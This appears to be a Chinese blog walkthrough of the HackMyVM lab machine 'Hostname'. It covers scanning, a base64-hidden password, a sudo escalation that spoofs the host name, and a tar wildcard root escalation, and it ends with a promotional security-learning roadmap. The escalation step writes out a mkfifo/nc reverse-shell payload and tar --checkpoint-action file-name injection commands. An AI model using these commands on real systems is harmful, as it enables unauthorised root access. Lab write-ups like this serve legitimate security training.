HackMyVM-hostname

文章详细描述了一次针对新靶机的渗透测试过程,涉及主机发现、端口扫描、sudo提权(包括伪造主机名)、通配符提权、web信息收集、base64解码、Linux环境分析及提权策略。作者分享了从中学习到的新技巧和网络安全入门建议。
摘要由CSDN通过智能技术生成

难度:简单

链接:https://hackmyvm.eu/machines/machine.php?vm=Hostname

这台靶机是上周刚刚发布的一台靶机,算是蛮新的

攻击手法:

主机发现

端口扫描

sudo提权(伪造主机名)

古老的通配符提权

信息收集阶段

主机发现

zhy@zhy-pc ~ % sudoarp-scan -l    
Interface: wlan0, type: EN10MB, MAC: dc:1b:a1:ba:dd:3f, IPv4: 192.168.1.100  
Starting arp-scan 1.9.7 with 256hosts (https://github.com/royhills/arp-scan)  
192.168.1.1     30:fc:68:d2:72:bc       TP-LINK TECHNOLOGIES CO.,LTD.  
192.168.1.101   08:00:27:85:91:f2       PCS Systemtechnik GmbH  
192.168.1.108   0c:70:4a:91:41:1e       HUAWEI TECHNOLOGIES CO.,LTD  
192.168.1.102   14:85:7f:c4:37:0e       (Unknown)  
​  
5packets received by filter, 0packets dropped by kernel  
Ending arp-scan 1.9.7: 256hosts scanned in1.966 seconds (130.21 hosts/sec). 4responded

端口扫描

开放了22和80端口

zhy@zhy-pc ~ % sudonmap -p--Pn192.168.1.101                                                                    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-1310:19 CST  
Nmap scan report forwarzone.local (192.168.1.101)  
Host is up (0.000076s latency).  
Not shown: 65533closed tcp ports (reset)  
PORT   STATE SERVICE  
22/tcp open  ssh  
80/tcp open  http  
MAC Address: 08:00:27:85:91:F2 (Oracle VirtualBox virtual NIC)  
​  
Nmap done: 1IP address (1 host up) scanned in0.70 seconds  
zhy@zhy-pc ~ % sudonmap -p22,80 -A-Pn192.168.1.101   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-1310:19 CST  
Nmap scan report forwarzone.local (192.168.1.101)  
Host is up (0.00073s latency).  
​  
PORT   STATE SERVICE VERSION  
22/tcp open  ssh   OpenSSH 8.4p1 Debian 5(protocol 2.0)  
| ssh-hostkey:   
|   307227:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)  
|   256e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)  
|_  2565d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)  
80/tcp open  http    nginx 1.18.0  
|_http-server-header: nginx/1.18.0  
|_http-title: Panda  
MAC Address: 08:00:27:85:91:F2 (Oracle VirtualBox virtual NIC)  
Warning: OSScan results may be unreliable because we could not findat least 1open and 1closed port  
Device type: general purpose  
Running: Linux 4.X|5.X  
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5  
OS details: Linux 4.15 -5.6  
Network Distance: 1hop  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
​  
TRACEROUTE  
HOP RTT     ADDRESS  
1 0.73 ms warzone.local (192.168.1.101)  
​  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1IP address (1 host up) scanned in8.29 seconds  
​

web信息

发现web界面,发现需要提交Secret Word,对web界面进行有价值的信息收集

查看页面源码发现一段base64编码信息,button标签被打上了disabled属性,这就意味禁用该参数,但是内容不是disabled而是po

<divclass="form-group">  
    <pclass="alert">Give Some Input..!!</p>  
    <!-- Kung Fu Panda -->  
    <buttonclass="btn"name="username"disabled="po">Read</button>  
</div>  
</form>  
<linkrel="stylesheet"href="./assets/cool.css"><br><br>  
<h2style="font-size:4vw"><span>I</span>M<span>POSSIBLE</span></h2>  
<scriptcrossorigin="S3VuZ19GdV9QNG5kYQ=="src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>  
<scriptsrc="./assets/script.js"></script>

对base64编码信息进行解码,猜测是我们需要提交的Secret Word

255zhy@zhy-pc ~ % echo"S3VuZ19GdV9QNG5kYQ=="| base64 -d  
Kung_Fu_P4nda

将button标签disabled属性抹出后提交解码后的内容,弹窗现实了一串内容,猜测为22端口ssh服务的密码

尝试是用ssh服务进行登陆,用户名猜测为disabled内容po

zhy@zhy-pc ~ % sshpo@192.168.1.101                    
po@192.168.1.101's password:   
Linux hostname 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64  
​  
The programs included with the Debian GNU/Linux system are free software;  
the exact distribution terms foreach program are described inthe  
individual files in/usr/share/doc/*/copyright.  
​  
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent  
permitted by applicable law.  
Last login: Thu May 1221:38:18 2022from 192.168.1.100  
po@hostname:~$ 

提权

查看linux版本以及内核,无法利用内核漏洞进行提权

po@hostname:~$ uname-a  
Linux hostname 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64 GNU/Linux

sudo 提权,无法进行提权

显示不能运行在主机hostname上

po@hostname:~$ sudo-l  
[sudo] password forpo:   
Sorry, user po may not run sudoon hostname.  
po@hostname:~$ 

计划任务提权

发现存在一项每分钟执行的计划任务,而且使用tar命令使用了通配符
po@hostname:~$ cat/etc/crontab   
# /etc/crontab: system-wide crontab  
# Unlike any other crontab you don't have to run the `crontab'  
# command to install the new version when you edit this file  
# and files in /etc/cron.d. These files also have username fields,  
# that none of the other crontabs do.  
​  
SHELL=/bin/sh  
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  
​  
# Example of job definition:  
# .---------------- minute (0 - 59)  
# |  .------------- hour (0 - 23)  
# |  |  .---------- day of month (1 - 31)  
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...  
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat  
# |  |  |  |  |  
# *  *  *  *  * user-name command to be executed  
*  *    * * *   root    cd/opt/secret/ && tar -zcf/var/backups/secret.tgz *  
17*    * * *   root    cd/ && run-parts --report/etc/cron.hourly  
256  * * *   root    test -x/usr/sbin/anacron || ( cd/ && run-parts --report/etc/cron.daily )  
476  * * 7 root    test -x/usr/sbin/anacron || ( cd/ && run-parts --report/etc/cron.weekly )  
526  1* *   root    test -x/usr/sbin/anacron || ( cd/ && run-parts --report/etc/cron.monthly )

进入到/opt/secret目录下,发现po用户并没有写入权限,需要提权到oogway

po@hostname:/opt/secret$ ls-la  
total 20  
drwxrwxr-x 2root   oogway 4096May 1221:46  .  
drwxrwxr-x 3root   oogway 4096Apr 2114:27  ..  
po@hostname:/opt/secret$   
​

进行sudo提权时提示 may not run sudo on hostname

以此为基础进行内网信息收集

po@hostname:/etc$ ls-la| grepsudo  
-rw-r--r--1root root    3975Feb 272021sudo.conf  
-r--r-----1root root     669Feb 272021sudoers  
drwxr-xr-x  2root root    4096Apr 2110:02 sudoers.d  
-rw-r--r--1root root    6169Feb 272021sudo_logsrvd.conf

发现suoers.d目录我们是可以访问的(一般情况是不允许普通用户访问)

po@hostname:/etc$ cdsudoers.d/  
po@hostname:/etc/sudoers.d$ ls  
po  README  
po@hostname:/etc/sudoers.d$ catpo   
po HackMyVM =(oogway) NOPASSWD: /bin/bash

查看文件里po内容,是允许po在HackMyVM主机名下不需要输入密码使用oogway用户执行/bin/bash命令

使用sudo命令提权

po@hostname:/etc/sudoers.d$ sudo-uoogway -hHackMyVM /bin/bash  
sudo: unable to resolve host HackMyVM: Name or servicenot known  
oogway@hostname:/etc/sudoers.d$ id  
uid=1001(oogway) gid=1001(oogway) groups=1001(oogway)  
oogway@hostname:/etc/sudoers.d$ 

虽然提示未知的服务名字,但是命令还是执行成功提升为了oogway权限

查看flag

oogway@hostname:~$ pwd  
/home/oogway     
oogway@hostname:~$ catuser.txt   
081ecc5e6dd6ba***********0e62ec50

通配符提权

攻击机上开启监听

nc-nvlpport

/opt/secret下执行命令

echo"mkfifo /tmp/lhennp; nc hackip hackport 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp"> shell.sh  
echo""> "--checkpoint-action=exec=sh shell.sh"  
echo""> --checkpoint=1

等待回连

zhy@zhy-pc ~ % nc-nvlpport  
Connection from 192.168.1.101:59670  
python3 -c"import pty;pty.spawn('/bin/bash')"  
root@hostname:/opt/secret# id  
id  
uid=0(root) gid=0(root) groups=0(root)

提升shell

python3 -c"import pty;pty.spawn('/bin/bash')"

查看oogway下的flag

root@hostname:~# pwd  
pwd  
/root  
root@hostname:~# cat root.txt  
catroot.txt  
d5806296126a********aa172ff9c9151  
​

总结:

靶机难度不难,主要是两个提权过程,sudo提权对本人来说是收获了一种新的姿势,通配符提权已经是老生常谈的一种提权姿势,新老结合,蛮有趣的。

学习网络安全技术的方法无非三种:

第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。

第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

第三种就是去找培训。

image.png

接下来,我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。

第一阶段:基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分,俗话说:基础不劳,地动山摇
image.png

第二阶段:web渗透

学习基础 时间:1周 ~ 2周:

① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透,学一学案例的思路,每一个站点都不一样,所以思路是主要的。
③ 学会提问的艺术,如果遇到不懂得要善于提问。
image.png

配置渗透环境 时间:3周 ~ 4周:

① 了解渗透测试常用的工具,例如(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。

渗透实战操作 时间:约6周:

① 在网上搜索渗透实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗透测试的阶段,每一个阶段需要做那些动作:例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中进行实践,使用一个含有XSS漏洞的cms,安装安全狗等进行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
image.png
以上就是入门阶段

第三阶段:进阶

已经入门并且找到工作之后又该怎么进阶?详情看下图
image.png

给新手小白的入门建议:
新手入门学习最好还是从视频入手进行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸收,这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦!

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值